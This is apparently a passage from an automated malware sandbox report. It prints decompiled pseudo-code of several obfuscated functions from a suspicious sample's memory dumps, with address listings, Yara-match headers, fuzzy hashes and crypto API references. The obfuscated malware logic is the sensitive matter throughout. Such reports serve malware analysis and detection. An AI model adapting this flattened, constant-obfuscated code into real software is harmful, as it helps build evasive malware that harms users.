				_v24 = _v24 ^ 0x0006fa2b;
				_v16 = 0xd6eb;
				_v16 = _v16 >> 0xb;
				_v16 = _v16 ^ 0x0000394e;
				_v40 = 0x5ece;
				_v40 = _v40 * 0x43;
				_v40 = _v40 / _t170;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0x000003d1;
				_v28 = 0xdfec;
				_v28 = _v28 >> 6;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x001be0b4;
				_v20 = 0x73b;
				_v20 = _v20 ^ 0xd6615083;
				_v20 = _v20 ^ 0xd6610707;
				_v36 = 0x46b8;
				_v36 = _v36 | 0xf1966772;
				_v36 = _v36 ^ 0x374c3a36;
				_v36 = _v36 * 0x27;
				_v36 = _v36 ^ 0x4b440184;
				_v8 = 0xd697;
				_v8 = _v8 ^ 0x6f8084df;
				_v8 = _v8 ^ 0x6f807f26;
				_t171 = _v4;
				while(_t148 != 0x24e4c4b) {
					if(_t148 == 0xc9f1fee) {
						_t148 = 0x3ad8e818;
						continue;
					} else {
						if(_t148 == 0x1ffca7a2) {
							E00241AB6(1, _v12, _t148, _a20, 1, _v24, _v16, _v4, _a4, _v40, _v28, _v20);
							_t175 =  &(_t175[0xa]);
							_t148 = 0x24e4c4b;
							_t172 =  !=  ? 1 : _t172;
							continue;
						} else {
							if(_t148 == 0x34494570) {
								if(E00240729(_v32,  &_v4, _v44, _t171) != 0) {
									_t148 = 0x1ffca7a2;
									continue;
								}
							} else {
								if(_t148 != 0x3ad8e818) {
									L13:
									if(_t148 != 0x2a0664e6) {
										continue;
									}
								} else {
									_t144 = E0023F6DF(_t148);
									_t171 = _t144;
									if(_t144 != 0xffffffff) {
										_t148 = 0x34494570;
										continue;
									}
								}
							}
						}
					}
					return _t172;
				}
				E00244F7D(_v36, _v8, _v4);
				_t148 = 0x2a0664e6;
				goto L13;
			}


























                                                      0x002317b3
                                                      0x002317ba
                                                      0x002317bb
                                                      0x002317bc
                                                      0x002317c0
                                                      0x002317c4
                                                      0x002317c6
                                                      0x002317cb
                                                      0x002317d3
                                                      0x002317dc
                                                      0x002317de
                                                      0x002317e5
                                                      0x002317ea
                                                      0x002317f0
                                                      0x002317fc
                                                      0x00231801
                                                      0x00231807
                                                      0x0023180f
                                                      0x0023181c
                                                      0x0023181f
                                                      0x0023182b
                                                      0x0023182f
                                                      0x00231837
                                                      0x0023183f
                                                      0x00231847
                                                      0x0023184f
                                                      0x00231853
                                                      0x0023185b
                                                      0x00231863
                                                      0x0023186b
                                                      0x00231873
                                                      0x0023187b
                                                      0x00231883
                                                      0x0023188b
                                                      0x00231890
                                                      0x00231898
                                                      0x002318a5
                                                      0x002318a6
                                                      0x002318aa
                                                      0x002318af
                                                      0x002318b7
                                                      0x002318bf
                                                      0x002318c4
                                                      0x002318cc
                                                      0x002318d9
                                                      0x002318e3
                                                      0x002318e7
                                                      0x002318ec
                                                      0x002318f4
                                                      0x002318fc
                                                      0x00231901
                                                      0x00231906
                                                      0x0023190e
                                                      0x00231916
                                                      0x0023191e
                                                      0x00231926
                                                      0x00231933
                                                      0x0023193b
                                                      0x00231948
                                                      0x0023194c
                                                      0x00231954
                                                      0x0023195c
                                                      0x00231964
                                                      0x0023196c
                                                      0x00231970
                                                      0x00231982
                                                      0x00231a1a
                                                      0x00000000
                                                      0x00231988
                                                      0x0023198a
                                                      0x00231a03
                                                      0x00231a08
                                                      0x00231a0b
                                                      0x00231a12
                                                      0x00000000
                                                      0x0023198c
                                                      0x00231992
                                                      0x002319d5
                                                      0x002319d7
                                                      0x00000000
                                                      0x002319d7
                                                      0x00231994
                                                      0x0023199a
                                                      0x00231a3b
                                                      0x00231a41
                                                      0x00000000
                                                      0x00000000
                                                      0x002319a0
                                                      0x002319a8
                                                      0x002319ad
                                                      0x002319b2
                                                      0x002319b8
                                                      0x00000000
                                                      0x002319b8
                                                      0x002319b2
                                                      0x0023199a
                                                      0x00231992
                                                      0x0023198a
                                                      0x00231a50
                                                      0x00231a50
                                                      0x00231a30
                                                      0x00231a36
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: >$$z$6:L7$N9$pEI4$pEI4
                                                      • API String ID: 0-302225334
                                                      • Opcode ID: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
                                                      • Instruction ID: 264d070849df8c1b975648e5a33df35598f3db68e84b70a681082842ca8b208f
                                                      • Opcode Fuzzy Hash: d928014d7ecf15c2aff048d75bb162baffc58cf9acc09ad34620927ff094ad0e
                                                      • Instruction Fuzzy Hash: 1C6163B11183419FD348CE65D88581FBBE5BFC8358F404A1EF196962A0C3B5CA6ACF83
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 002420C5, Relevance: 7.6, Strings: 6, Instructions: 145COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E002420C5() {
				char _v524;
				signed int _v528;
				signed int _v532;
				intOrPtr _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				void* _t124;
				short* _t127;
				void* _t132;
				void* _t134;
				intOrPtr _t150;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				signed int _t167;
				void* _t169;

				_t169 = (_t167 & 0xfffffff8) - 0x250;
				_v532 = _v532 & 0x00000000;
				_v528 = _v528 & 0x00000000;
				_t132 = 0x3ec8c14;
				_v536 = 0x37230;
				_v544 = 0xcdd0;
				_v544 = _v544 >> 7;
				_v544 = _v544 ^ 0x000074a7;
				_v572 = 0xb951;
				_v572 = _v572 + 0xffffa9df;
				_v572 = _v572 ^ 0x00005eca;
				_v584 = 0x3783;
				_v584 = _v584 >> 1;
				_t159 = 0x30;
				_v584 = _v584 / _t159;
				_v584 = _v584 ^ 0x00007df0;
				_v592 = 0x764f;
				_t160 = 0x29;
				_v592 = _v592 * 0x6c;
				_v592 = _v592 + 0xffff1483;
				_v592 = _v592 ^ 0x0030effe;
				_v580 = 0x26e4;
				_v580 = _v580 + 0xffffa17d;
				_v580 = _v580 >> 0xc;
				_v580 = _v580 ^ 0x000fb6a3;
				_v588 = 0x592d;
				_v588 = _v588 * 0x5e;
				_v588 = _v588 + 0xfffff058;
				_v588 = _v588 ^ 0x0020c0b6;
				_v576 = 0x67c6;
				_v576 = _v576 >> 4;
				_v576 = _v576 | 0x70f0481f;
				_v576 = _v576 ^ 0x70f020ed;
				_v568 = 0x5c9a;
				_v568 = _v568 ^ 0x6d262440;
				_v568 = _v568 ^ 0x6d2624e4;
				_v552 = 0x512d;
				_v552 = _v552 / _t160;
				_v552 = _v552 ^ 0x00002fd7;
				_v540 = 0x67a3;
				_v540 = _v540 + 0x741c;
				_v540 = _v540 ^ 0x0000c39d;
				_v560 = 0xac4b;
				_v560 = _v560 | 0x611015d1;
				_v560 = _v560 ^ 0x6110f087;
				_v548 = 0xff97;
				_v548 = _v548 >> 8;
				_v548 = _v548 ^ 0x000016db;
				_v556 = 0xce04;
				_t161 = 0x2b;
				_v556 = _v556 / _t161;
				_v556 = _v556 ^ 0x000048b5;
				_v564 = 0x85d6;
				_v564 = _v564 >> 0xf;
				_v564 = _v564 ^ 0x00007642;
				do {
					while(_t132 != 0x3ec8c14) {
						if(_t132 == 0x4e3e716) {
							_push(_v572);
							_t124 = E0024889D(0x24c9b0, _v544, __eflags);
							_pop(_t134);
							_t150 =  *0x24ca2c; // 0x698300
							_t108 = _t150 + 0x230; // 0x7a0043
							E0023C680(_t108, _v592, _v580, _t134, _v588,  *0x24ca2c, _t124,  &_v524);
							_t169 = _t169 + 0x1c;
							_t127 = E00242025(_v576, _t124, _v568, _v552);
							_t132 = 0x36d909ae;
							continue;
						} else {
							if(_t132 == 0x2942dba3) {
								_t127 = E00242B16(_v548,  &_v524, E002484CC, _v564, 0,  &_v524);
							} else {
								if(_t132 != 0x36d909ae) {
									goto L8;
								} else {
									_t127 = E002328CE( &_v524, _v540, _v560);
									 *_t127 = 0;
									_t132 = 0x2942dba3;
									continue;
								}
							}
						}
						L11:
						return _t127;
					}
					_t132 = 0x4e3e716;
					L8:
					__eflags = _t132 - 0x16e8989b;
				} while (__eflags != 0);
				goto L11;
			}































                                                      0x002420cb
                                                      0x002420d1
                                                      0x002420d8
                                                      0x002420dd
                                                      0x002420e2
                                                      0x002420ea
                                                      0x002420f2
                                                      0x002420f7
                                                      0x002420ff
                                                      0x00242107
                                                      0x0024210f
                                                      0x00242117
                                                      0x0024211f
                                                      0x0024212d
                                                      0x00242132
                                                      0x00242138
                                                      0x00242145
                                                      0x0024215c
                                                      0x0024215f
                                                      0x00242163
                                                      0x0024216b
                                                      0x00242173
                                                      0x0024217b
                                                      0x00242183
                                                      0x00242188
                                                      0x00242190
                                                      0x0024219d
                                                      0x002421a1
                                                      0x002421a9
                                                      0x002421b1
                                                      0x002421b9
                                                      0x002421be
                                                      0x002421c6
                                                      0x002421ce
                                                      0x002421d6
                                                      0x002421de
                                                      0x002421e6
                                                      0x002421f6
                                                      0x002421fa
                                                      0x00242202
                                                      0x0024220a
                                                      0x00242212
                                                      0x0024221a
                                                      0x00242222
                                                      0x0024222a
                                                      0x00242232
                                                      0x0024223a
                                                      0x0024223f
                                                      0x00242247
                                                      0x00242253
                                                      0x00242256
                                                      0x0024225a
                                                      0x00242262
                                                      0x0024226a
                                                      0x0024226f
                                                      0x00242277
                                                      0x00242277
                                                      0x00242285
                                                      0x002422ae
                                                      0x002422bb
                                                      0x002422c0
                                                      0x002422dc
                                                      0x002422e6
                                                      0x002422ec
                                                      0x002422f1
                                                      0x00242302
                                                      0x00242309
                                                      0x00000000
                                                      0x00242287
                                                      0x00242289
                                                      0x00242339
                                                      0x0024228f
                                                      0x00242291
                                                      0x00000000
                                                      0x00242293
                                                      0x0024229f
                                                      0x002422a7
                                                      0x002422aa
                                                      0x00000000
                                                      0x002422aa
                                                      0x00242291
                                                      0x00242289
                                                      0x00242341
                                                      0x00242348
                                                      0x00242348
                                                      0x00242310
                                                      0x00242312
                                                      0x00242312
                                                      0x00242312
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -Q$-Y$Bv$Ov$$&m$&
                                                      • API String ID: 0-2434786051
                                                      • Opcode ID: 190095b375f8a9e8f5931243a11a7ef555f847ccc54168a8f8c5417840ecaf4c
                                                      • Instruction ID: c6c1dbc34df42e263c4c7a55ed743f158a6199bc5e193a4933f0676fcd8ecc2c
                                                      • Opcode Fuzzy Hash: 190095b375f8a9e8f5931243a11a7ef555f847ccc54168a8f8c5417840ecaf4c
                                                      • Instruction Fuzzy Hash: 2E516771118341AFD368CF25C88A91BBBF1FBC4368F509A1DF585862A0C7B58959CF86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 100021F0, Relevance: 7.6, APIs: 5, Instructions: 67encryptionmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
                                                      • CoTaskMemAlloc.OLE32(?), ref: 10002227
                                                      • CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
                                                      • StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
                                                      • CoTaskMemFree.OLE32(00000000), ref: 1000227A
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: BinaryCryptStringTask$AllocDeserializeFreePropVariant
                                                      • String ID:
                                                      • API String ID: 2967290590-0
                                                      • Opcode ID: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
                                                      • Instruction ID: 3bbe9fb0322c03d3a19eaaaaa04faf6b757ff22615bcfcbc1accf4c01beb8128
                                                      • Opcode Fuzzy Hash: a0ae73a94a10ec4d1b341bf8883d6d6a7a5478298e4569a97f919236a601242f
                                                      • Instruction Fuzzy Hash: 51116D3AA01129BBEB10DBD48C44FDE77FCDB457A1F010266FE05E2154DA719A408AA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00236754, Relevance: 6.4, Strings: 5, Instructions: 140COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E00236754(intOrPtr __ecx, intOrPtr* __edx) {
				char _v520;
				signed int _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				unsigned int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				void* _t96;
				signed int _t97;
				signed int _t101;
				intOrPtr _t104;
				signed int _t106;
				signed int _t107;
				void* _t108;
				signed int _t123;
				void* _t124;
				intOrPtr* _t128;
				signed int* _t129;

				_t129 =  &_v572;
				_v524 = _v524 & 0x00000000;
				_v532 = 0x37527f;
				_v528 = 0x4295e6;
				_v536 = 0xee22;
				_v536 = _v536 >> 0xc;
				_v536 = _v536 ^ 0x00007a3a;
				_v544 = 0x8f72;
				_v544 = _v544 | 0xa1a2610a;
				_v544 = _v544 ^ 0xa1a2ad19;
				_v540 = 0xc65b;
				_v540 = _v540 << 9;
				_v540 = _v540 ^ 0x018ca8d5;
				_v572 = 0x4354;
				_v572 = _v572 << 0xd;
				_v572 = _v572 + 0xffff6940;
				_v572 = _v572 * 0x52;
				_t128 = __edx;
				_v572 = _v572 ^ 0xb1ecefd2;
				_v552 = 0x7a0c;
				_t104 = __ecx;
				_v552 = _v552 | 0xfffddbf7;
				_t124 = 0x1663684c;
				_v552 = _v552 ^ 0xfffd8a47;
				_v568 = 0x9348;
				_t106 = 0xf;
				_v568 = _v568 * 0x32;
				_v568 = _v568 + 0x92e3;
				_v568 = _v568 * 0x69;
				_v568 = _v568 ^ 0x0c08d7a0;
				_v556 = 0x9f50;
				_v556 = _v556 / _t106;
				_v556 = _v556 >> 2;
				_v556 = _v556 ^ 0x000022d0;
				_v548 = 0xa3e1;
				_v548 = _v548 >> 0xd;
				_v548 = _v548 ^ 0x000031bd;
				_v564 = 0x55b6;
				_v564 = _v564 >> 1;
				_v564 = _v564 + 0xaf4f;
				_t107 = 0x5e;
				_t123 = _v548;
				_v564 = _v564 / _t107;
				_v564 = _v564 ^ 0x0000417a;
				_v560 = 0xe775;
				_v560 = _v560 << 4;
				_v560 = _v560 << 0xd;
				_v560 = _v560 ^ 0xceea6264;
				do {
					while(_t124 != 0x32e36bf) {
						if(_t124 == 0xcc4ee6e) {
							 *((intOrPtr*)(_t123 + 0x24)) = _t104;
							_t97 =  *0x24ca24; // 0x0
							 *(_t123 + 0x2c) = _t97;
							 *0x24ca24 = _t123;
							return _t97;
						}
						if(_t124 != 0x1663684c) {
							if(_t124 == 0x2308bbf2) {
								return E0023F536(_v548, _v564, _v560, _t123);
							}
							if(_t124 != 0x242d3c72) {
								goto L12;
							} else {
								_push( &_v520);
								_t101 = E002388E5(_t104, _t128);
								asm("sbb esi, esi");
								_t107 = 0x24c910;
								_t124 = ( ~_t101 & 0xe0257acd) + 0x2308bbf2;
								continue;
							}
							L16:
							return _t101;
						}
						_push(_t107);
						_t108 = 0x38;
						_t101 = E00238736(_t108);
						_t123 = _t101;
						_t107 = _t107;
						if(_t123 != 0) {
							_t124 = 0x242d3c72;
							continue;
						}
						goto L16;
					}
					_push(_t107);
					_push(_v556);
					_push( &_v520);
					_push(_v568);
					_push(0);
					_push(_v552);
					_t107 = _v572;
					_push(0);
					_t96 = E0023568E(_t107, 0);
					_t129 =  &(_t129[7]);
					if(_t96 == 0) {
						_t124 = 0x2308bbf2;
						goto L12;
					} else {
						_t124 = 0xcc4ee6e;
						continue;
					}
					goto L16;
					L12:
				} while (_t124 != 0x2bbec955);
				return _t101;
			}




























                                                      0x00236754
                                                      0x0023675a
                                                      0x0023675f
                                                      0x00236767
                                                      0x0023676f
                                                      0x00236777
                                                      0x0023677c
                                                      0x00236784
                                                      0x0023678c
                                                      0x00236794
                                                      0x0023679c
                                                      0x002367a4
                                                      0x002367a9
                                                      0x002367b1
                                                      0x002367b8
                                                      0x002367bc
                                                      0x002367cb
                                                      0x002367cf
                                                      0x002367d1
                                                      0x002367db
                                                      0x002367e3
                                                      0x002367e5
                                                      0x002367ed
                                                      0x002367f2
                                                      0x002367fa
                                                      0x00236809
                                                      0x0023680c
                                                      0x00236810
                                                      0x0023681d
                                                      0x00236821
                                                      0x00236829
                                                      0x00236839
                                                      0x0023683d
                                                      0x00236842
                                                      0x0023684a
                                                      0x00236852
                                                      0x00236857
                                                      0x0023685f
                                                      0x00236867
                                                      0x0023686b
                                                      0x00236877
                                                      0x0023687a
                                                      0x0023687e
                                                      0x00236882
                                                      0x0023688a
                                                      0x00236892
                                                      0x00236897
                                                      0x0023689c
                                                      0x002368a4
                                                      0x002368a4
                                                      0x002368b2
                                                      0x00236984
                                                      0x00236987
                                                      0x0023698c
                                                      0x0023698f
                                                      0x00000000
                                                      0x0023698f
                                                      0x002368be
                                                      0x002368c6
                                                      0x00000000
                                                      0x00236981
                                                      0x002368d2
                                                      0x00000000
                                                      0x002368d8
                                                      0x002368de
                                                      0x002368e6
                                                      0x002368f0
                                                      0x002368f8
                                                      0x002368f9
                                                      0x00000000
                                                      0x002368f9
                                                      0x0023699f
                                                      0x0023699f
                                                      0x0023699f
                                                      0x0023690d
                                                      0x00236911
                                                      0x00236912
                                                      0x00236917
                                                      0x0023691a
                                                      0x0023691d
                                                      0x0023691f
                                                      0x00000000
                                                      0x0023691f
                                                      0x00000000
                                                      0x0023691d
                                                      0x00236929
                                                      0x0023692a
                                                      0x00236934
                                                      0x00236935
                                                      0x00236939
                                                      0x0023693b
                                                      0x0023693f
                                                      0x00236943
                                                      0x00236945
                                                      0x0023694a
                                                      0x0023694f
                                                      0x0023695b
                                                      0x00000000
                                                      0x00236951
                                                      0x00236951
                                                      0x00000000
                                                      0x00236951
                                                      0x00000000
                                                      0x00236960
                                                      0x00236960
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: :z$r<-$$r<-$$u$zA
                                                      • API String ID: 0-4189644680
                                                      • Opcode ID: 86d232f8efbc88837c505427109f0e3599ce15e139d8a6a1de7a3c3cf3c78fa0
                                                      • Instruction ID: f3af6f531a140bdd196b3ef3c74a434b9fb8403054edc712698feacff5f812af
                                                      • Opcode Fuzzy Hash: 86d232f8efbc88837c505427109f0e3599ce15e139d8a6a1de7a3c3cf3c78fa0
                                                      • Instruction Fuzzy Hash: 7A519BB1518302AFD318CF26C54961FBBE4EBC8758F10891DF4D8A62A0D7B4DA19CF82
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0023839D, Relevance: 6.4, Strings: 5, Instructions: 140COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 98%
                                                      			E0023839D(void* __ecx, void* __edi) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				int _t181;
				signed int _t184;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				signed int _t194;
				void* _t211;
				void* _t215;
				signed int _t217;

				_v28 = 0x5ca2;
				_v28 = _v28 + 0x82ee;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0x06fc8008;
				_v52 = 0x31f1;
				_v52 = _v52 * 0x4e;
				_t215 = __ecx;
				_t186 = 0x39;
				_v52 = _v52 * 0x4d;
				_v52 = _v52 >> 7;
				_v52 = _v52 ^ 0x00092748;
				_v20 = 0x7fc5;
				_v20 = _v20 * 0x6b;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x00d59d54;
				_v44 = 0xb39b;
				_v44 = _v44 + 0xf7d;
				_v44 = _v44 | 0x2a7b5142;
				_v44 = _v44 + 0xffff17c4;
				_v44 = _v44 ^ 0x2a7aeb0e;
				_v60 = 0x1587;
				_v60 = _v60 | 0x5979cfaa;
				_v60 = _v60 ^ 0xb2ac8491;
				_v60 = _v60 ^ 0x62b96002;
				_v60 = _v60 ^ 0x896c4508;
				_v16 = 0x3e7;
				_v16 = _v16 | 0x10c95731;
				_v16 = _v16 ^ 0x10c93485;
				_v56 = 0x1ea8;
				_v56 = _v56 << 4;
				_v56 = _v56 << 6;
				_v56 = _v56 / _t186;
				_v56 = _v56 ^ 0x0002353c;
				_v12 = 0x5bc0;
				_t187 = 0x13;
				_v12 = _v12 / _t187;
				_v12 = _v12 ^ 0x00001b6c;
				_v48 = 0x8f53;
				_v48 = _v48 ^ 0x72e3c217;
				_v48 = _v48 >> 0xb;
				_v48 = _v48 ^ 0x701cd0a1;
				_v48 = _v48 ^ 0x7012c214;
				_v24 = 0xa180;
				_v24 = _v24 | 0x7584ea2b;
				_v24 = _v24 + 0x36fb;
				_v24 = _v24 ^ 0x75854120;
				_v32 = 0x424b;
				_v32 = _v32 ^ 0x8f16dfbf;
				_v32 = _v32 << 0xc;
				_v32 = _v32 + 0xffffa50c;
				_v32 = _v32 ^ 0x69defe02;
				_v8 = 0x6622;
				_t188 = 0x62;
				_v8 = _v8 / _t188;
				_v8 = _v8 ^ 0x00007651;
				_v36 = 0x9705;
				_t189 = 0x5a;
				_v36 = _v36 * 0x11;
				_v36 = _v36 / _t189;
				_v36 = _v36 | 0xcd876993;
				_v36 = _v36 ^ 0xcd872ff9;
				_v40 = 0x44cf;
				_v40 = _v40 | 0x3f74ab7e;
				_v40 = _v40 << 1;
				_v40 = _v40 + 0x396f;
				_v40 = _v40 ^ 0x7eea1d0a;
				_v4 = E00248C8F(_t189);
				_t217 = _v28 + E00248C8F(_t189) % _v52;
				_t184 = _v20 + E00248C8F(_v52) % _v44;
				if(_t217 != 0) {
					_t211 = _t215;
					_t194 = _t217 >> 1;
					_t215 = _t215 + _t217 * 2;
					_t181 = memset(_t211, 0x2d002d, _t194 << 2);
					asm("adc ecx, ecx");
					memset(_t211 + _t194, _t181, 0);
				}
				E0023D6C9(_v8, _t215, 3, _t184, _v36,  &_v4, _v40);
				 *((short*)(_t215 + _t184 * 2)) = 0;
				return 0;
			}




























                                                      0x002383a0
                                                      0x002383aa
                                                      0x002383b2
                                                      0x002383b7
                                                      0x002383bf
                                                      0x002383d1
                                                      0x002383d5
                                                      0x002383dc
                                                      0x002383df
                                                      0x002383e3
                                                      0x002383e8
                                                      0x002383f0
                                                      0x002383fd
                                                      0x00238401
                                                      0x00238406
                                                      0x0023840e
                                                      0x00238416
                                                      0x0023841e
                                                      0x00238426
                                                      0x0023842e
                                                      0x00238436
                                                      0x0023843e
                                                      0x00238446
                                                      0x0023844e
                                                      0x00238456
                                                      0x0023845e
                                                      0x00238466
                                                      0x0023846e
                                                      0x00238476
                                                      0x0023847e
                                                      0x00238483
                                                      0x00238490
                                                      0x00238494
                                                      0x0023849c
                                                      0x002384a8
                                                      0x002384ad
                                                      0x002384b3
                                                      0x002384bb
                                                      0x002384c3
                                                      0x002384cb
                                                      0x002384d0
                                                      0x002384d8
                                                      0x002384e0
                                                      0x002384e8
                                                      0x002384f0
                                                      0x002384f8
                                                      0x00238500
                                                      0x00238508
                                                      0x00238510
                                                      0x00238515
                                                      0x0023851d
                                                      0x00238525
                                                      0x00238531
                                                      0x00238536
                                                      0x0023853c
                                                      0x00238544
                                                      0x00238551
                                                      0x00238552
                                                      0x0023855c
                                                      0x00238560
                                                      0x00238568
                                                      0x00238570
                                                      0x00238578
                                                      0x00238580
                                                      0x00238584
                                                      0x0023858c
                                                      0x002385a1
                                                      0x002385c2
                                                      0x002385d9
                                                      0x002385dd
                                                      0x002385e2
                                                      0x002385e4
                                                      0x002385e6
                                                      0x002385ee
                                                      0x002385f0
                                                      0x002385f2
                                                      0x002385f5
                                                      0x0023860f
                                                      0x00238619
                                                      0x00238623

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2106829948.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true
                                                      • Associated: 00000007.00000002.2106820868.0000000000230000.00000004.00000001.sdmp Download File
                                                      • Associated: 00000007.00000002.2106848056.000000000024C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BQ{*$H'$KB$Qv$o9
                                                      • API String ID: 0-3657823386
                                                      • Opcode ID: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
                                                      • Instruction ID: a2c1dafa6e4ae7dd7163a34a47f8d035f325ec48cf95caaa5c5dad6c234790c2
                                                      • Opcode Fuzzy Hash: cc563c4f974bf484883b2de3c1cdd218fb05770f9d62957089e07ad233a0ec37
                                                      • Instruction Fuzzy Hash: F86101711093419FD348CF25D58A50FBBE1FBC8748F408A1DF1DA96260D7B9DA198F86
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00235B79, Relevance: 5.2, Strings: 4, Instructions: 219COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E00235B79(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr* _t203;
				intOrPtr _t214;
				intOrPtr _t215;
				intOrPtr _t216;
				intOrPtr _t220;
				intOrPtr _t224;
				void* _t243;
				intOrPtr _t244;
				intOrPtr _t245;
				signed int _t246;
				signed int _t247;
				signed int _t248;
				signed int _t249;
				intOrPtr _t250;
				intOrPtr _t252;
				signed int* _t253;

				_t215 = __ecx;
				_t253 =  &_v116;
				_v20 = __edx;
				_v32 = __ecx;
				_v12 = 0xafae1;
				_v4 = 0;
				_v8 = 0x46e7c7;
				_v100 = 0x4e85;
				_v100 = _v100 >> 4;
				_v100 = _v100 + 0xa122;
				_v100 = _v100 ^ 0x0000ef7f;
				_v76 = 0x276c;
				_v76 = _v76 + 0xa4ad;
				_v76 = _v76 ^ 0x0000a5d4;
				_v116 = 0xc292;
				_v36 = 0;
				_v116 = _v116 * 0x3d;
				_t243 = 0x5ac7f3d;
				_v116 = _v116 << 0xc;
				_t246 = 0x1a;
				_v116 = _v116 / _t246;
				_v116 = _v116 ^ 0x08d6c610;
				_v96 = 0x57a;
				_v96 = _v96 << 4;
				_v96 = _v96 + 0xde71;
				_v96 = _v96 ^ 0x000109c0;
				_v108 = 0xf9e9;
				_v108 = _v108 >> 0xe;
				_v108 = _v108 + 0xffffa4d5;
				_t247 = 0x1e;
				_v108 = _v108 * 0x3c;
				_v108 = _v108 ^ 0xffeac835;
				_v112 = 0x3502;
				_v112 = _v112 >> 0xc;
				_v112 = _v112 + 0xffffe509;
				_v112 = _v112 >> 0xe;
				_v112 = _v112 ^ 0x0003f015;
				_v64 = 0x4162;
				_v64 = _v64 + 0xffff06ec;
				_v64 = _v64 ^ 0xffff0d41;
				_v68 = 0x29f6;
				_v68 = _v68 | 0xa40114db;
				_v68 = _v68 ^ 0xa4015458;
				_v72 = 0x8ebc;
				_v72 = _v72 | 0xb773f5bd;
				_v72 = _v72 ^ 0xb773df20;
				_v52 = 0x199c;
				_v52 = _v52 + 0x59c9;
				_v52 = _v52 ^ 0x00005d96;
				_v56 = 0x9de2;
				_v56 = _v56 | 0x18b104fc;
				_v56 = _v56 ^ 0x18b18c09;
				_v60 = 0xcf04;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x0000237a;
				_v92 = 0x847f;
				_v92 = _v92 / _t247;
				_v92 = _v92 + 0xfffff45a;
